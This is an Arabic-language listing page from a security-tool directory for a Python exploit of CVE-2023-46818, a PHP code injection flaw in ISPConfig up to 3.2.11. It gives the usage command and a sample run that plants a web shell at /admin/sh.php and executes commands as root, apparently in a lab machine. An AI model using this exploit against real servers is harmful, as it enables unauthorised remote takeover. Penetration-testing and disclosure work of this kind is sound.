Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/ajdumanhug/cve-2023-46818
توليد الحمولةتحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubajdumanhug/cve-2023-46818

CVE-2023-46818

CVE-2023-46818 استغلال Python3 لثغرة حقن كود PHP في ISPConfig <= 3.2.11 (language_edit.php)

عرض المستودع
152منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال Python لـ CVE-2023-46818

🔥 الوصف

يستهدف هذا السكربت الاستغلالي المكتوب بلغة Python ثغرة أمنية في معامل POST الخاص بـ records في ISPConfig والموجه إلى /admin/language_edit.php، والذي لا يتم تعقيمه بشكل صحيح. وهذا يسمح لمسؤول مُصادق عليه بحقن وتنفيذ كود PHP عشوائي.

⚠️ الإصدارات المتأثرة

الإصدار 3.2.11 والإصدارات السابقة له.

⚙️ الاستخدام

root@kitploit:~
python3 CVE-2023-46818.py <URL> <Username> <Password>

💻 نموذج تشغيل

root@kitploit:~
┌──(motoh4ck3r㉿kali)-[~/HTB/Linux/nocturnal]
└─$ python3 CVE-2023-46818.py http://127.0.0.1:8081 motoh4ck3r broombroom
[+] Logging in with username 'motoh4ck3r' and password 'broombroom'
[+] Login successful!
[*] Fetching CSRF tokens...
[+] CSRF ID: language_edit_92017c65f0bcba0f230f5cc1
[+] CSRF Key: 7d06eed7d23c29e5c9633920a8122339d91373e8
[+] Injecting shell payload...
[+] Shell written to: http://127.0.0.1:8081/admin/sh.php
[+] Launching shell...

ispconfig-shell# hostname & whoami & id
nocturnal
root
uid=0(root) gid=0(root) groups=0(root)

ispconfig-shell#

ℹ️ المرجع

https://seclists.org/fulldisclosure/2023/Dec/2

❤️ الاعتمادات

تحية إلى Egidio Romano على هذا الاكتشاف.

تنزيل الأداة